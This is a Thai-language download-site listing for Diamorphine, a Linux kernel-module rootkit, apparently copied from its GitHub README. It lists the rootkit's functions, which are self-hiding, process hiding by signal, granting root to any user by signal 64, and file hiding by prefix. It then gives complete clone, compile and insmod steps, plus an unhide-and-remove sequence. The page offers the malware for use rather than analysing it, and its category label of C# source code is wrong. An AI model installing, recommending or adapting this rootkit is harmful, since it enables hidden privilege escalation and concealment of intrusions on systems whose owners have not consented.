หน้าแรก>การเขียนโปรแกรมที่เกี่ยวข้อง>ซอร์สโค้ด C#
ดาวน์โหลด

ไดมอร์ฟีน

Diamorphine เป็นรูทคิท LKM สำหรับ Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 และ ARM64)

คุณสมบัติ

  • เมื่อโหลดแล้ว โมดูลจะเริ่มมองไม่เห็น

  • ซ่อน/ยกเลิกการซ่อนกระบวนการใดๆ โดยการส่งสัญญาณ 31;

  • การส่งสัญญาณ 63 (ไปยัง pid ใด ๆ ) ทำให้โมดูลมองเห็นได้ (ใน)

  • การส่งสัญญาณ 64 (ไปยัง pid ใด ๆ ) ทำให้ผู้ใช้ที่กำหนดกลายเป็นรูท

  • ไฟล์หรือไดเร็กทอรีที่ขึ้นต้นด้วย MAGIC_PREFIX จะมองไม่เห็น

  • ที่มา: https://github.com/m0nad/Diamorphine

ติดตั้ง

ตรวจสอบว่าเคอร์เนลเป็น 2.6.x/3.x/4.x/5.x หรือไม่ 

 uname -r

โคลนพื้นที่เก็บข้อมูล 

 git clone https://github.com/m0nad/Diamorphine

เข้าสู่โฟลเดอร์ 

 cd Diamorphine

รวบรวม 

 make

โหลดโมดูล (ในฐานะรูท) 

 insmod diamorphine.ko

ถอนการติดตั้ง

โมดูลเริ่มมองไม่เห็น หากต้องการลบคุณต้องทำให้มองเห็นได้ 

 kill -63 0

จากนั้นลบโมดูล (ในฐานะรูท) 

 rmmod diamorphine

อ้างอิง

วิกิพีเดียรูทคิท https://en.wikipedia.org/wiki/Rootkit

ไดรเวอร์อุปกรณ์ Linux http://lwn.net/Kernel/LDD3/

LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html

บล็อกของ Memset http://memset.wordpress.com/

การแพตช์เคอร์เนล Linux ทันทีโดยไม่มี LKM http://phrack.org/issues/58/7.html

การเขียน ROOTKIT อย่างง่ายสำหรับ LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

การอ้างอิงข้าม Linux http://lxr.free-electrons.com/

zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/

Linux Rootkits: วิธีการใหม่สำหรับ Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/

ขยาย
ข้อมูลเพิ่มเติม
แอปที่เกี่ยวข้อง
แนะนำสำหรับคุณ
ข้อมูลที่เกี่ยวข้อง ทั้งหมด